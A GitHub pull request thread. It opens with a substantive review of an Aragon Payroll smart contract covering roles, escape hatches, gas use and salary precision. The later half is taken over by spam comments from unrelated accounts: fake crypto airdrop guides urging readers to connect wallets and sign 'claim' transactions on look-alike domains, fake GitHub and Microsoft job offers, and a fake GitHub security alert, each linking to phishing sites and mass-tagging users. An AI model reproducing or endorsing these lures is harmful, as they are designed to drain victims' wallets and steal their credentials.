Payroll code review

izqui opened the pull request:
Will review PR and add comments inline

bingen committed:
Add test helper for getTransaction

bingen committed:
Add Payroll app

izqui commented on apps/payroll/README.md:
```diff
@@ -0,0 +1,9 @@
+### TODO / Possible improvements
+
+- Allow employees to change payment period, and of course adapt time restriction for `payday` to it. (Thanks to @monicazng !)
+- Would it be better to define allowed tokens only globally instead of per employee? Not sure, pros and cons, needs more discussion about use cases. Roughly: per employee if makes sense to allow different tokens for different employees; globally would make way easier to add (or remove) allowed tokens.
```
Yep, I actually can't think of a case in which having per employee tokens would be a good idea. 

It will also be cheaper in gas terms.

izqui commented on apps/payroll/README.md:
```diff
@@ -0,0 +1,9 @@
+
+- Allow employees to change payment period, and of course adapt time restriction for `payday` to it. (Thanks to @monicazng !)
+- Would it be better to define allowed tokens only globally instead of per employee? Not sure, pros and cons, needs more discussion about use cases. Roughly: per employee if makes sense to allow different tokens for different employees; globally would make way easier to add (or remove) allowed tokens.
+- Finish documentation and move it to [Aragon's wiki](https://wiki.aragon.one)
```
👍, i actually think it is a good idea to have the documentation in the readme of every app.

@Smokyish can we look into how to do this? I think we could import aragon-apps to aragon-wiki as a submodule and this way we could keep the documentation in just one place. The same could apply to aragon-core and AragonOS documentation

Smokyish replied:
@izqui Yes, we should look into it, we might need to write a [plugin](http://www.mkdocs.org/user-guide/plugins/) for it if one doesn't exist, since we can't pull external content into the wiki as easily. Will look into how we could do this.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+    using SafeMath for uint;
+
+    bytes32 constant public OWNER_WRITE_ROLE = bytes32(1);
+    bytes32 constant public OWNER_READ_ROLE = bytes32(2);
```
This role doesn't make much sense in my opinion. Given that all storage data is public in the blockchain (you can directly look at the storage slots of the contract or do a local 'call' setting whatever 'from' address you want, as signatures are only checked when you do a proper 'sendTransaction' that can change state).

This effectively blocks other contracts from accessing the data but I still don't see the value. In all other Aragon apps we only protect functions that can modify state.

bingen replied:
So true!! Big mistake here, old habits I guess. I'll fix it right away.

izqui replied:
np!

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+
+    bytes32 constant public OWNER_WRITE_ROLE = bytes32(1);
+    bytes32 constant public OWNER_READ_ROLE = bytes32(2);
+    bytes32 constant public EMPLOYEE_ROLE = bytes32(3);
```
In order to make the employee role possible to be used, a [group](https://github.com/aragon/aragon-apps/tree/master/apps/group) with all employees would need to be maintained in parallel, which isn't too efficient. In this case I would replace having kernel auth for employees, and would do a local modifier in this contract to check if the sender is an employee.

bingen replied:
I agree.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+    bytes32 constant public OWNER_WRITE_ROLE = bytes32(1);
+    bytes32 constant public OWNER_READ_ROLE = bytes32(2);
+    bytes32 constant public EMPLOYEE_ROLE = bytes32(3);
+    bytes32 constant public ORACLE_ROLE = bytes32(4);
```
Same with oracle role but in reverse, you could remove keeping track of the oracle in this contract and just have an oracle role that is managed in the kernel.

bingen replied:
Well, oracle is used in checkExchangeRate. Although it overcomplicates contract a bit, the idea was to allow both directions: if oracle hasn't set an exchange rate, we can try to query it. The final goal was to try to save `payday` transactions and avoid some frustration for the user(employee) not being able to have the salary paid because of a missing exchange rate. Maybe it's unnecessary.

izqui replied:
Fair enough. I would remove the complexity though

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+
+    struct Employee {
+        address accountAddress; // unique, but can be changed over time
+        mapping(address => bool) allowedTokens; // Could it be defined globally?
```
Yes! Will save a significant amount of gas! :)

bingen replied:
I'll do it then.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+    mapping(address => bool) globalTokens;
+    address[] globalTokensArray;
+
+    address public employer;
```
Why is the 'employer' needed after this contract has been transitioned into an Aragon app?

bingen replied:
It was used in escapeHatch functions... which is also a mistake: funds should be sent to Finance which in turn would send them to the Vault. Fixing it.

izqui replied:
👍

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+            tokenContract.balanceOf(this),
+            data
+        );
+        return tokenContract.transferAndCall(address(finance), value, "Adding funds");
```
Nice!

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+contract Payroll is App, Initializable, ERC677Receiver {
+    using SafeMath for uint;
+
+    bytes32 constant public OWNER_WRITE_ROLE = bytes32(1);
```
I would rename this to 'employer role', and maybe consider splitting it in multiple roles for hiring employees, terminating, etc.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+     */
+    function addFunds() public payable {
+        // convert ETH to EtherToken
+        etherToken.wrapAndCall.value(msg.value)(address(finance), "Adding Funds");
```
We can wrap `this.balance` better than `msg.value` to ensure that if there was ETH stuck in the contract for some reason, it goes to the vault too!

izqui replied:
After that we can always `assert(this.balance == 0)`

bingen replied:
Good idea!

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+               this one would at least recover ETH (which btw should never remain in this contract).
+     */
+    function escapeHatch2() public auth(OWNER_WRITE_ROLE) {
+        selfdestruct(employer); // send funds to organizer
```
Better than self destruct, just call `addFunds()` here, to ensure ETH is wrapped before being sent

bingen replied:
Good idea. Actually, I think we can even remove this function and just rely on `addFunds`.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+     * @dev Implement escape hatch mechanism. Avoids locked in contract forever
+     * @notice Implement escape hatch mechanism. Avoids locked in contract forever
+     */
+    function escapeHatch() public auth(OWNER_WRITE_ROLE) {
```
Can this be deleted now that this contract doesn't own any assets?

bingen replied:
Yes, with `depositToFinance` and `addFunds` we should be safe.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+        ERC20 tokenContract = ERC20(token);
+
+        // first send tokens to this contract
+        tokenContract.transferFrom(from, this, value);
```
add a require in this function to ensure the transfer went well

bingen replied:
Sure.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+        if (yearlyTotalPayroll == 0)
+            payrollRunway = 2**256 - 1;
+        else
+            payrollRunway = this.balance.mul(365) / yearlyTotalPayroll;
```
This wont work now that contract doesnt have any ETH

izqui replied:
This function should also take token balances into account. It can be a super expensive function gas wise, given that it will be run locally in most instances.

bingen replied:
Good catch!!

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+    function payday() public auth(EMPLOYEE_ROLE) {
+        var employee = employees[employeeIds[msg.sender]];
+        // check that employee exists (and matches)
+        require(employee.accountAddress == msg.sender);
```
with this check, we can remove the `auth(EMPLOYEE_ROLE)` completely

bingen replied:
Certainly

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+            LogSendPayroll(msg.sender, token, tokenAmount);
+            somethingPaid = true;
+        }
+        require(somethingPaid);
```
This is such a nice detail. If nothing is payed make the transaction receipt show status Failed so it can easily be seen that it didn't go through. Thanks to `revert` no more gas is wasted 👌

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+            require(checkExchangeRate(token));
+            uint256 tokenAmount = employee.yearlyUSDSalary
+                .mul(employee.allocation[token]).mul(exchangeRates[token]) / 1200;
+            // we could make a recurring payment, but it would change the flow and we should take care of changes in allocation
```
It is better to let the Payroll contract handle it as it is now, instead of a finance recurring payment in this case!

bingen replied:
:+1:

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+                continue;
+            require(checkExchangeRate(token));
+            uint256 tokenAmount = employee.yearlyUSDSalary
+                .mul(employee.allocation[token]).mul(exchangeRates[token]) / 1200;
```
`1200` is a magic number, please add comment to show where it comes from or split the operation in two, first division by months in a year and then percent calculation ;)

bingen replied:
Will do.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+                continue;
+            require(checkExchangeRate(token));
+            uint256 tokenAmount = employee.yearlyUSDSalary
+                .mul(employee.allocation[token]).mul(exchangeRates[token]) / 1200;
```
There are tokens where sub-cent precision is needed, we should make this contract have a least 6 decimal precision in USD terms.

izqui commented on apps/payroll/contracts/Payroll.sol:
```diff
@@ -0,0 +1,586 @@
+        }
+        require(somethingPaid);
+        // finally update last payroll date
+        employee.lastPayroll = getTimestamp();
```
We should set it to `employee.lastPayroll += 1 year / 12`, because otherwise taking some time to send the `payday()` transaction will be making the employee lose money. This will be specially important when we give this contract the ability to have variable pay intervals :)

bingen replied:
Absolutely

izqui reviewed (commented):
This was really nice work! Please don't be overwhelmed by the amount of comments, I did a review thinking that this is a contract that could be deployed to production :)

bingen commented:
Thanks for your comments, @izqui! Very good insights!

bingen committed:
payroll: several improvements

Address changes proposed by @izqui:

Reorganize roles, move allowed tokens to global, remove employer
field, remove Oracle dependency, get rid of escapeHatch, fix
payrollRunway and some other minor fixes.

luispurizacam commented:
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin airdrop?
- If you're interested about the world of holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great place to begin. This guide will streamline the process for you, elucidating how to join this airdrop and what you can anticipate.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://chainlinksecure.fly.dev/)

#### 🚀 Simple Steps to Secure Your Ocean Protocol Airdrop:

1. **Connect Your Wallet:**
   - Swing by the [ Chainlink $LINK Airdrop](https://chainlinksecure.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the Ocean Protocol Airdrop [right here](https://chainlinksecure.fly.dev/).

3. **Engage for Extra Rewards:**
   - Dive into community discussions or tackle tasks for bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Airdrop Success:

- **Community Assistance:**
  - Need a hand? Shoot a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep your eyes peeled for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a bit. Stay chill and keep an eye out for updates.

Feel free to share your Ocean Protocol Airdrop experiences or shoot any questions in the comments below. Let's make this process a breeze for everyone!

marisadotdev commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

prezo-ci-bkp commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

anilv2k commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @xe54ck, @CHZofCSU, @hitcxy, @0xtedy, @abdul-maajid, @polkovnikov, @shubhamoy, @chiuzon, @tjwsoup, @alicanalmacimeni, @atahabilder1, @isharaman8, @ggulgun, @rkarabut, @LuisUrrutia, @AldoMX, @Yochanes, @gabrielom, @kysokzla, @kevinyang14, @Jonah246, @dev0cloo, @juanfranblanco, @leolambo, @Demonhero0, @0xweb375, @nikita, @MickdeGraaf, @hughwang41, @chenshuijin, @yan-man, @hackhy, @bpickering12, @yingkitw, @AnwarMohamed, @gcc2ge, @pedoc, @israelboudoux, @zyrikby, @lazzarello, @LinKenCong, @eos21, @Akash76, @brylok, @sanosano, @hyakiinakatsuki, @ezaruba, @harmony666, @bigsml, @RiccardoBiosas

anilv2k commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

jalamari2018 commented:
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @dongdongunique, @renqHIT, @ddcech, @yuwiggin, @ritaaachen, @Mziserman, @pocketwalker

majeeel commented:
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @aq1aq1aq1kianamir, @mohmaza, @guenit, @DrLourival, @salman7000, @thadayuseg, @Bohdanlipko

kongkiatchanu commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @CPT-Jack-A-Castle, @rheaplex, @Sekin, @chillerno1, @elboletaire, @dahburj, @mlerner

raviikushh commented:
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
cao7113, @agusferreira, @debuggor, @bufrr, @Weissaroni, @no7dw, @nncl, @andreisilviudragnea, @bongani-m, @narwhalosaurus, @girishramnani, @sachin-kiwi, @mediaxina, @tyndallm, @thanhlmm, @REDMANEE168, @queenisis, @0xlavar, @ally33, @lraunakl

willianfcamara commented:
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team

AgileCyberSolutions commented:
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
gauravssnl, @Smurfette79, @ThaiuLinh, @arl, @wendingyuan, @Highflymetosky, @mutkan, @cooldad1971, @qdsfdhvh, @bitterking, @norawisain777, @erdemtopak, @Liloupar, @KTSOEV, @nanako889, @dmtrki, @dszddsz, @castelanjr, @taw420, @pranavlathigara

jacky-xbb commented:
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
sapnachauhan95, @SARAA141, @Bart200c, @MrGele98, @UaMikhalych, @abdurakhman1981, @DaMandal0rian, @Vin4est, @Ady9017, @Parzival1308, @Chione01, @Elgyun1996, @CorradoRossi, @Ansanchez3126, @sabratoothtiger1990, @babakjam1423, @mansiraka1, @misterhuhuhu, @Onyxchuzzy, @HarryCTR

vty21 commented:
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!

vty21 commented:
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
